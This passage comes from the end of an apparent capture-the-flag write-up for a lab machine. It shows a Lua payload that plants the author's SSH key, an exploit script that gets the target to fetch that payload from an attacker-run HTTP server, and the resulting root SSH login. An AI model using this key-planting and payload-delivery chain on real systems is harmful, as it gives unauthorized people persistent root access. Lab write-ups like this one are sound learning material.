file:write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+P7qV7kjQ7RaxUNNeAlQkREHCUKW1kXitmHwdrpDZ+MZlfmZmYPJ75A+/m/S6JVS4qi8oCXthZX06j0x1oaGrKAsoYSuMMU+eN40gp+9I2IaPglv0407yL4fJMqy0jnb9ID+g5c+OTTH8q7tQ0wvcFLZpOnnbHVp2Autgb9Plx4fppNAQcHn11VBXTv+e48RKcC44gJULVhqp8eB8lT5O2pT5aHP58s3dggTMn5rwzxK7k6jT638rHNWUM84WhepzQb9dE3NYLX2RRdshBIIfqVeIUZfxWg5fcLjgTfdV7lb4zrJbS9KXH8UWb8NSfM73Pwy3mSFSdtNC59qTZEiN838bBSJbFtcBj8aVHWrdEjowGBzv8yYcrLC7tpFZyHxLsQsenOf/MTUKtqrqQq/tRVwcwhbYHXH2fIcU1x+pEI8qxpLHR64fiynxwrnVP/FSGchvvX3hnzkdDE3g51lvMhpkAxX30aqwd1Hmqs8YRYVA43atczbLo1TaNto3QkU= [email protected]")
3
file:close()
Copied!
I had to execute the exploit a couple of times until it worked as expected.
1
python3 exploit.py
Copied!
We can see the lua exploit was getting retrieved by the service.
1
[email protected]:/tmp$ python3 -m http.server 4443
2
Serving HTTP on 0.0.0.0 port 4443 (http://0.0.0.0:4443/) ...
3
127.0.0.1 - - [05/Jun/2020 16:48:31] "GET /exploit.lua HTTP/1.0" 200 -
Copied!

Root

And we got root user.
1
$ ssh [email protected] -i id_rsa
2
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
3
4
* Documentation: https://help.ubuntu.com
5
* Management: https://landscape.canonical.com
6
* Support: https://ubuntu.com/advantage
7
8
System information as of Fri 05 Jun 2020 04:48:35 PM UTC
9
10
System load: 0.04 Processes: 263
11
Usage of /: 6.7% of 97.93GB Users logged in: 2
12
Memory usage: 40% IP address for ens33: 10.10.10.190
13
Swap usage: 1% IP address for docker0: 172.17.0.1
14
15
16
57 updates can be installed immediately.
17
0 of these updates are security updates.
18
To see these additional updates run: apt list --upgradable
19
20
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
21
22
23
Last login: Sun May 24 03:33:34 2020
25
uid=0(root) gid=0(root) groups=0(root)
26
[email protected]:~# hostname
27
dyplesher
28
[email protected]:~# cat root.txt
29
dfd34xxxxxxxxxxxxxxxxxxxxx
Copied!
This box took me 25 hours of work, most of the time was in the enumeration part, once you know the behaviour of the services is easily accomplished after some research and development guides.
Hope you liked it, happy hacking!
Last modified 1yr ago